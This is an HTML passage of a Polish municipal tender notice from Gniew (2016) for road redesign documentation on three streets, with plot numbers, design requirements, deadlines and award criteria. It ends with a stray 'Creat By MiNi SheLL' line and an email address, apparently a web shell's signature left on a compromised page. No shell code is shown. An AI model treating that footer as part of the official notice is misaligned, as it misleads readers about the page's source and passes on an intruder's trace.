<li>2 - Czas wykonania opracowania - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalne pod rygorem nieważności są zmiany istotnych postanowień zawartej umowy         w stosunku do treści oferty, z wyjątkiem zmian, o których mowa w ust. 3.
3. Zmiany w umowie mogą dotyczyć:
a) terminu wykonania zamówienia,
b) wysokości wynagrodzenia Wykonawcy,
4. Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) rezygnacji z realizacji części zamówienia,
2) przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np.: przedłużania terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
3) czasowego wstrzymania prac przez Zamawiającego.
5. Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
1) odstąpienia (rezygnacji) od części zamówienia, lub rozszerzenia jego zakresu,
2) zmiany stawki podatku VAT, przy czym ceny netto nie ulegają zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gniew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Gniewie, Plac Grunwaldzki 1, 83-140 Gniew, pok. 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 12:00, miejsce: Urząd Miasta i Gminy w Gniewie, Plac Grunwaldzki 1, 83-140 Gniew, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa ulicy Partyzantów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Podstawa opracowania, zakres, dane ogólne.
Należy zaprojektować przebudowę i remont ulicy Partyzantów w zakresie przebudowy chodnika, jezdni, systemu odwodnienia, zieleni, oświetlenia, małej architektury, zlokalizowanej pomiędzy ulicą 27 Stycznia (droga powiatowa), a ulicą Kusocińskiego (droga gminna). Zakres projektowanej inwestycji obejmuje działki: nr 20/1 (arkusz mapy 7) oraz działkę 35/3 (arkusz mapy 9) 
w Gniewie i stanowi teren zabudowy mieszkaniowej wielorodzinnej i jednorodzinnej bliźniaczej.  Ulica Partyzantów jest drogą klasy D - dojazdowa. Długość pasa drogowego około 270 m, chodników około 350m.
Teren objęty jest MPZP, którego wypis i wyrys stanowi załącznik nr  8 do SIWZ.
Zamawiający nie posiada mapy do celów projektowych.

2.Opis stanu istniejącego.
      W stanie istniejącym droga gminna, na projektowanym odcinku, posiada przekroj poprzeczny jedniojezdniowy, dwupasmowy o zmiennej szerokości. Chodniki po obu stronach drogi również 
o zmiennej szerokości, spełniają funkcje związaną z ruchem pieszym. W obecnym stanie technicznym droga gminna nie spełnia swego przeznaczenia pod względem bezpieczeństwa ruchu kołowego  i pieszego. Główne niebezpieczeństwo to zły stan nawierzchni jezdni.  Przy zabudowie bliźniaczej - trylinka z ubytkami; przy zabudowie wielorodzinnej- nawierzchnia bitumiczna, spękana i zdeformowana,  o widocznych śladach napraw cząstkowych. Stan techniczny istniejących chodników zły, popękane płyty chodnikowe z ubytkami.
Odwodnienie drogi zrealizowane poprzez spadki podłużne i poprzeczne jezdni. Wody opadowe 
na przedmiotowym odcinkku drogi są odprowadzane do kanalizacji deszczowej. Aktualnie, 
w czasie opadów, następuje niekontrolowany spływ powierzchniowy ścieków opadowych, czego przyczyną są zastoiska wody. Warunki gruntowo - wodne na projektowanym odcinku są dobre, nie stwierdzono występowania wód gruntowych.
3. Rozwiązania projektowe. W dokumentacji należy przewidzieć opracowanie rozwiązań projektowych z uwzględnieniem następujących parametrów:
a)Na odcinku zabudowy bliźniaczej (od nr 1 - 4) zaprojektować przebudowę chodników, po obydwu stronach, o szerokości spełniającej wymogi ruchu pieszego - 2,00m, uwzględniającymi zatoczkami postojowe o normatywnych wymiarach. Taka sama sama sytuacja przy budynku wielorodzinnym nr 10.
b)Maksymalne pochylenie podłużne projektowanego chodnika powinno wynosić 6%, pochylenie poprzeczne 2%,
c)Chodnik obramować: od strony jezdni krawężnikiem betonowym 20x30 cm na ławie betonowej z oporem, od strony zabudowań betonowym obrzeżem,
d)Nawierzchnię chodników i drogi  zaprojektować  z kostki betonowej szarej i kolorowej
gr. 8cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych;
e)Wody opadowe z  jezdni i chodnika odprowadzić za pośrednictwem wpustów i studzienek do istniejącej kanalizacji deszczowej, w uzgodnieniu z Zakładem Wodociagów i Kanalizacji spółka INWEST-KOM w Gniewie.
f)Zaplanować wycinkę, kolidującego z inwestycją, istniejącego drzewostanu z zaplanowanymi nasadzeniami. 
g)Nachylenia terenu przy budynkach wielorodzinnych nr 11 i 11A zabezpieczyć odpowiednią zielenią lub płytami betonowymi ażurowymi.
h)W razie konieczności przewidzieć likwidację lub przełożenie oświetlenia drogowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Czas wykonania opracowania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa ulicy Kapinosa w Gniewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Podstawa opracowania, zakres, dane ogólne.
Zakres projektowanej inwestycji obejmuje działki nr 31; 32; 33; 43/29; 43/30; 43/31; 43/32; 43/33; 43/34, arkusz mapy 17, obręb 0019 miasto Gniew, zlokalizowanej, pomiędzy ul. Gdańskiej (droga powiatowa), a  ul. Hallera (droga gminna),  zgodnie z zakresem, oznaczonym na mapie kolorem zielonym,  stanowiącej załącznik nr 9 do SIWZ i stanowi teren zabudowy jednorodzinnej. Ulica Kapinosa oznaczona jest w MPZP symbolem KDW I KDD, którego wypis i wyrys stanowi załącznik nr 9 do SIWZ. Długość projektowanej drogi wynosi ok. 850 m.
Zamawiający nie posiada mapy do celów projektowych.

2. Opis stanu istniejącego.
W stanie istniejącym droga gminna, na projektowanym odcinku posiada nawierzchnię gruntową, utwardzoną kamieniem łamanym. Na odcinku, oznaczonym w MPZP symbolem KDW, jest istniejący chodnik, nie spełniający obowiązujących norm. Teren jest uzbrojony w sieć wodociagową 
i kanalizacyjną oraz szczątkową kanalizację deszczową. 

3. Rozwiązania projektowe.
Inwestycja nie będzie wykraczała poza obszar pasa drogowego. Nawierzchnię jezdni oraz chodników zaprojektować z kostki brukowej (na jezdni oraz wjazdach na posesje kostka gr. 8 cm, na chodnikach gr. 6 cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych).
Rodzaj i kolor kostki brukowej, elementy infrastruktury (włazy studni, kratki ściekowe, elementy BRD itp.), typ oznakowania pionowego i poziomego oraz inne szczegóły należy uzgadniać z zamawiającym na etapie projektowym. Należy zapewnić odpowiednie odwodnienie pasa drogowego. Istniejące 
w jezdni włazy kanalizacji osadzić w prefabrykowanych elementach betonowych. Zapewnić lokalizację elementów wyposażenia dróg (np. znaków drogowych, słupów oświetleniowych),  w miarę możliwości poza ciągami komunikacyjnymi, tak aby zachować wymagane przepisami skrajnie.
Należy zapewnić oświetlenie drogi zgodnie z § 109 ww. Rozporządzenia w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Czas wykonania opracowania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej dla zadania: Przebudowa drogi wewnętrznej - Osiedle Leśne w Tymawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Podstawa opracowania, zakres, dane ogólne.
Zakres projektowane inwestycji obejmuje działki nr 18/13; 298/1; 298/2; 312; 325; 339; 349; 367, arkusz mapy 1, obręb 0007 Tymawa, zlokalizowanym przy drodze powiatowej nr  2823 G Nicponia -Jaźwiska - Opalenie, zgodnie z zakresem oznaczonym kolorem żółtym na mapie stanowiącej załącznik nr 10 do SIWZ i stanowi teren zabudowy jednorodzinnej.  Droga dojazdowa oznaczona jest w MPZP symbolem KDW I KDX, którego wypis i wyrys stanowi załącznik nr 10 do SIWZ. Długość projektowanych dróg wynosi ok. 1515 m.
Zamawiający posiada mapę do celów projektowych w wersji papierowej i elektronicznej.

2. Opis stanu istniejącego.
W stanie istniejącym droga gminna, na projektowanym odcinku posiada nawierzchnię gruntową, utwardzoną kamieniem łamanym. Teren jest uzbrojony w sieć wodociagową 
i kanalizacyjną oraz  kanalizację deszczową. 

3. Rozwiązania projektowe.
Inwestycja nie będzie wykraczała poza obszar pasa drogowego.Nawierzchnię jezdni oraz chodników zaprojektować z kostki brukowej (na jezdni oraz wjazdach na posesje kostka gr. 8 cm, na chodnikach gr. 6 cm, a konstrukcję podbudowy dostosować do warunków gruntowo-wodnych).
Rodzaj i kolor kostki brukowej, elementy infrastruktury (włazy studni, kratki ściekowe, elementy BRD itp.), typ oznakowania pionowego i poziomego oraz inne szczegóły należy uzgadniać z zamawiającym na etapie projektowym.
W projekcie należy zastosować elementy poprawiające bezpieczeństwo i uspokajające ruch, typu azyle na przejściach dla pieszych, wysepki korygujące tor ruchu pojazdów w celu wymuszenia zmniejszenia prędkości lub innych elementów zaproponowanych przez Projektanta 
i zaakceptowanych przez Zamawiającego.
Wody opadowe z jezdni i chodników odprowadzić za posrednictwem wpustow i studzienek 
do istniejącej kanalizacji deszczowej. 
Istniejace w jezdni włazy kanalizacji osadzić w prefabrykowanych elementach betonowych.
Zapewnić lokalizację elementów wyposażenia dróg (np. znaków drogowych, słupów oświetleniowych) w miarę możliwości poza ciągami komunikacyjnymi, tak aby zachować wymagane przepisami skrajnie.
Należy zapewnić wymianę słupów i opraw oświetleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Czas wykonania opracowania - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com